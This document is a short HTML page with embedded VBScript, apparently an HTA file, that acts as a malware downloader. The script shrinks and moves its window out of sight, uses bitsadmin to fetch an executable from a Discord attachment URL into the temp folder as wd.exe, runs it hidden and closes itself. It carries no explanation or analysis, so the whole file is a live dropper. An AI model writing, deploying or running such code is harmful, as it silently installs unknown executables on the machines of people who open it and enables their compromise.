<html><body><script language="VBScript">
Window.ResizeTo 0,0:Window.MoveTo -5000,-5000

Dim shell: Set shell = CreateObject("WScript.Shell")
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
Dim temp: temp = fso.GetSpecialFolder(2)

shell.Run "bitsadmin /transfer d /download /priority high ""https://cdn.discordapp.com/attachments/1517616291660300400/1521274495304859820/navi.exe?ex=6a443cc7&is=6a42eb47&hm=bf1b1c901aa4c95f010a5b99e95a18a562e08b4e4362b7e6e725af25a91e0c66&"" """ & temp & "\wd.exe""", 0, True

If fso.FileExists(temp & "\wd.exe") Then
    shell.Run """" & temp & "\wd.exe""", 0, False
End If

window.close()
</script></body></html>
